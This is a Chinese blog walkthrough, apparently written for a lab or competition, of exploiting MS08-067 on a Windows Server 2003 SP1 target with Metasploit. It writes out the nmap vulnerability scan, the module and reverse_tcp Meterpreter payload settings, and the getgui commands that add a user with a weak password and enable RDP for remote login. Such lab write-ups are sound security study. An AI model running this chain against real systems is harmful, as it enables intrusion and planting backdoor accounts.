Metasploit渗透winserv 2003 sp1
今天因为比赛的原因写一个关于MS08_067的渗透文章,网上已经有很多前辈写过关于MS08_067的文章,非常的好,我也看了很多的文章,对我启发很大。话不多说!开始我今天做题用到的主角MS08_067。
首先我们要先安装好Kali linux 这个在座的肯定比我要熟,对里面的工具,命令已经很透彻了。
我们先对目标靶机进行信息收集,就用到了Nmap这个工具
我使用的参数是 -O 扫描系统版本信息、 -sV 是系统服务及版本信息、 --script=vuln 是使用脚本扫描,vuln是检查目标主机是否存在已知漏洞(例如:ms08_067)
扫描结束了,我们来看看结果
因为我这个之前做个实验,开启过3389 ,不过不会影响下面的操作的。
使用脚本扫描也扫描出来了结果,
常见漏洞有ms08-067、还有去年比较火的ms17-010。我们这里只需要用到我们的主角ms08-067。
然后我们调用Metasploit,在里面使用ms08_067
它会开始加载,第一次可能比较慢,耐心等待就好啦orz
终于进入了这个界面
我们需要用到ms08_067这个攻击载荷
我们快速搜索,使用search命令
搜索到路径文件。
我们使用use命令使用这个模块
进入后,我们查看一下需要设置的参数:show options
我们需要设置一下目标靶机IP地址:set RHOST 192.168.43.215
我的靶机是winserv2003 SP1 。
可以使用tab键进行补全。
仅此还是不够的,还需要设置payload。
我这里使用的是:windows/meterpreter/reverse_tcp
set payload windows/meterpreter/reverse_tcp
设置完成payload以后,我们在使用show options 查看一下需要配置的参数
多了一个LHOST 我们这时候输入自己kali本机ip地址:set LHOST 192.168.43.27(在这个地方使用tab键可以自动补全ip地址)
设置完成后,我们可以用exploit进行攻击测试。
现在给我们返回了一个meterpreter的对话框,我们可以在这里进行一些系统级别的操作。
我这里使用的是: run getgui -u CSND -p 123456
相信大家一定也知道我这条命令的用法, -u 是创建用户“CSDN” -p是设置密码“123456”
在以往的渗透中,一些人拿到了meterpreter的时候都会shell进入cmd,输入一大堆的命令去开启3389,命令太长,不愿意去记住,使用getgui 就可以轻松开始3389,让我们来看一下吧!
命令:run getgui -e
从反馈的信息来看,远程桌面已经准备好,RDP也已经启用,我们就可以确定3389已经开启。
这时候我们就可以使用万能的Kali linux 进行远程桌面连接了。
命令如下
rdesktop 192.168.43.215
这个工具可以让我们像在windows下一样连接远程桌面,非常的好用。
输入这时候我们前面设置的用户名和密码
进行登录。
成功进入了桌面,我们就可以做自己想做的事情了,emmm!意味着我要开始做题了。
这篇博客还有一些地方写的不好,时间原因也没有及时进行改进,请各位谅解
本人小白,各位大佬看了勿喷,希望大佬能多多指点我一下。
本人QQ:1627238774
喜欢渗透的朋友可以加我qq一起交流一下,好东西还是要分享的